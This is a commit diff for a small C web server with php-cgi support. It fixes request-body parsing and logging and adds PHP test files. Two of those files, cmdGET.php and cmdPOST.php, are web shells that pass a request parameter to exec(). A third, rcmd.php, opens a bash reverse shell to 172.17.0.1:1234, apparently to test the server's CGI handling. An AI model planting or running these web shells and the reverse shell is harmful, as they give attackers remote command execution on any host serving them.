bug fixes

Makefile

@@ -43,7 +43,7 @@ dockerTestDeploy: dockerBuild
 	docker run -p8080:8080 --rm -d seaweb:latest
 
 dockerReleaseDeploy: dockerBuild
-	docker run -p8080:8080 --rm -d seaweb:latest --cert /src/certs/cert.pem --privkey /src/certs/key.pem
+	docker run -p8080:8080 --rm -d seaweb:latest --cert /src/certs/cert.pem --privkey /src/certs/key.pem --verbose
 
 killTestDocker:
 	docker stop -t 0 `docker ps | grep "seaweb:latest" | tail -n 1 | tr -s " " | cut -d " " -f 1`

cmd/server.c

@@ -40,12 +40,16 @@ int parseHTTPRequest(unsigned char *buffer, struct HTTPRequest *r) {
 	int line = 0;
 	int contentCheck = 0;
 	unsigned char *checkLine = calloc(1000, sizeof(unsigned char));
+	size_t checkLineLen = 0;
 	unsigned char *logLine = malloc(sizeof(unsigned char));
 	char * varCheck;
 
 	// Creating empty requestBody
-	r->requestBody = calloc(8, sizeof(char));
+	r->requestBody = malloc(sizeof(char));
 	r->requestBodyLen = 0;
+	r->requestVars = malloc(sizeof(char));
+	memset(r->requestBody, 0, sizeof(char));
+	memset(r->requestVars, 0, sizeof(char));
 
 	for (int i = 0; i <= strlen((char *)buffer); i++) {
 		temp[0] = buffer[i];
@@ -84,12 +88,15 @@ int parseHTTPRequest(unsigned char *buffer, struct HTTPRequest *r) {
 				PrintLog(logLine);
 			} else { // Gather information on >first line
 				if (contentCheck) { // Once content check is set to one everything after is part of the body
+					printf("Check Line: %s\n", checkLine);
 					r->requestBody = realloc(r->requestBody,
-							(strlen((char *)checkLine) + strlen((char *)r->requestBody) + 1));
+							(checkLineLen + r->requestBodyLen + 2));
 					strcat((char *)r->requestBody, (char *)checkLine);
 					// Adding newline to requestBody
 					strcat((char *)r->requestBody, "\n");
-					r->requestBodyLen += strlen((char *)checkLine);
+					r->requestBodyLen += checkLineLen + 2;
+					printf("Size: %zu\nCheck Size: %zu\n", r->requestBodyLen, checkLineLen);
+					printf("Req:\n%s\n", r->requestBody);
 				} else { // Information parsing !content
 					if (strlen((char *)checkLine) == 1) { // Looking for blank empty line to end header info
 						contentCheck = 1;
@@ -118,10 +125,12 @@ int parseHTTPRequest(unsigned char *buffer, struct HTTPRequest *r) {
 			if (strlen((char *)checkLine) > 0) {
 				// Clear checkLine
 				memset(checkLine,0,strlen((char *)checkLine));
+				checkLineLen = 0;
 			}
 			line++;
 		} else {
 			strcat((char *)checkLine, temp);
+			checkLineLen++;
 		}
 	}
 

src/requestHandlers.c

@@ -145,7 +145,7 @@ int handlePOSTRequest(int socket, struct HTTPRequest *r, SSL *ssl) {
         }
 
         if (r->requestConType != NULL) {
-                if (!strcmp(r->requestConType, "application/x-www-form-utlencoded") == 0) {
+                if (!(strcmp(r->requestConType, "application/x-www-form-utlencoded") == 0)) {
                         printDebug("Application From Selected");
                 } else {
                         printDebug("Content will likely get parsed wrong");

src/utils.c

@@ -24,7 +24,7 @@ int PrintLog(unsigned char *message) {
 
 	if (!strcmp(WEB_ROOT_DIR, "/var/www/html/")) {
 		FILE *fp;
-		fp = fopen("/var/log/seaweb/log", "w");
+		fp = fopen("/var/log/seaweb/log", "a");
 		fprintf(fp, "[Log] %02d/%02d/%d %02d:%02d:%02d - %s\n", (now->tm_mon + 1), now->tm_mday,
 				(now->tm_year + 1900), now->tm_hour, now->tm_min, now->tm_sec, message);
 		fclose(fp);
@@ -81,7 +81,11 @@ char *php_cgi(char *sPath, struct HTTPRequest *r) {
                         putenv(conLenString);
                         putenv("CONTENT_TYPE=application/x-www-form-urlencoded");
                         queryString = malloc(r->requestBodyLen + 24);
-                        sprintf(queryString, "QUERY_STRING=%s", r->requestBody);
+			if (r->requestBodyLen != 0) {
+                        	sprintf(queryString, "QUERY_STRING=%s", r->requestBody);
+			} else {
+                        	sprintf(queryString, "QUERY_STRING=");
+			}
                         putenv(queryString);
 
                         // Starting fork to pipe stdin into php-cgi
@@ -99,15 +103,20 @@ char *php_cgi(char *sPath, struct HTTPRequest *r) {
                         } else if (pid < 0) { // Error forking
                                 printDebug("Error in stdin php frok");
                         } else { // Parent fork
-                                close(phpPipe[1]);
+                                close(phpPipe2[1]);
                                 dup2(phpPipe2[0], STDIN_FILENO);
                                 execl("/usr/bin/php-cgi", "php-cgi", NULL);
                         }
                 } else {
-                        queryString = malloc(strlen(r->requestVars) + 24);
-                        sprintf(queryString, "QUERY_STRING=%s", r->requestVars);
-                        putenv(queryString);
                         putenv("REQUEST_METHOD=GET");
+			if (r->requestVars != NULL) {
+                        	queryString = malloc(strlen(r->requestVars) + 24);
+                        	sprintf(queryString, "QUERY_STRING=%s", r->requestVars);
+			} else {
+                        	queryString = malloc(24);
+				sprintf(queryString, "QUERY_STRING=");
+			}
+                        putenv(queryString);
                         execl("/usr/bin/php-cgi", "php-cgi", NULL);
                 }
 		exit(EXIT_SUCCESS);

test_requests/cmd.php

@@ -0,0 +1,7 @@
+<?php
+$output=null;
+$retval=null;
+exec('whoami', $output, $retval);
+print_r($output);
+?>
+

test_requests/cmdGET.php

@@ -0,0 +1,7 @@
+<?php
+$output=null;
+$retval=null;
+exec($_GET['cmd'], $output, $retval);
+print_r($output);
+?>
+

test_requests/cmdPOST.php

@@ -0,0 +1,7 @@
+<?php
+$output=null;
+$retval=null;
+exec($_POST['cmd'], $output, $retval);
+print_r($output);
+?>
+

test_requests/rcmd.php

@@ -0,0 +1,3 @@
+<?php
+exec("/bin/bash -c 'bash -i >& /dev/tcp/172.17.0.1/1234 0>&1'");
+?>